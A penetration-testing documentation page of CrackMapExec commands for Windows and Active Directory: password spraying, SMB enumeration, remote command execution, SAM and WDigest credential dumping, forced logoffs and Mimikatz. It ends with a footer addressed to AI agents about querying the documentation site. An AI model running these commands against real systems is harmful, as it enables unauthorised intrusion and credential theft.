# Using Crackmapexec

Crackmapexec is a one-stop tool for pentesting Windows and Active Directory. It contains all the tools and commands explained in the previous section and more. Some of the things that the tools is capable of doing are enumerating SMB shares, users and groups, spraying passwords, auto-injecting Mimikatz/shellcode/DLL into memory, etc.

<details>

<summary>Username &#x26; Password Spraying</summary>

Crackmapexec can be used to guess the username and password to an SMB service,

```
crackmapexec smb 192.168.1.10 -u username.txt -p password.txt
```

</details>

<details>

<summary>Enumerating SMB Info</summary>

Various information can be enumerated from the SMB service such as the users, groups, shares, etc.

```
crackmapexec smb 192.168.1.10 -u 'user' -p 'PASS' --users

#Substitute the parameter with any of the following to fetch the respective info,
--groups --local-users --rid-brute "--local-auth --shares" --sessions --lusers --pass-pol
```

</details>

<details>

<summary>Remote Code Execution (RCE)</summary>

```
#Through CMD Prompt
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x 'whoami' 

#Through SMB Exec
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec

#Through Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X 'whoami'
```

</details>

<details>

<summary>Enumerating Credentials</summary>

{% code overflow="wrap" %}

```
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' --local-auth --sam
```

{% endcode %}

You can enable wdigest on the system and get the plain password using the following command,

```
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' --local-auth --wdigest enable
```

In order to get wdigest active the user has to logout and login back, which can be forced by the following command,

```
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' -x 'quser'
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' -x 'logoff <sessionid>'
```

</details>

<details>

<summary>Using Mimikatz</summary>

```
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' --local-auth -M mimikatz
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' -M mimikatz
crackmapexec smb 192.168.1.10 -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'
```

</details>

## Useful Links

<https://stealthbits.com/blog/20170725lateral-movement-with-crackmapexec/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.particle42.com/active-directory/all-commands-tools-and-scripts/using-crackmapexec.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.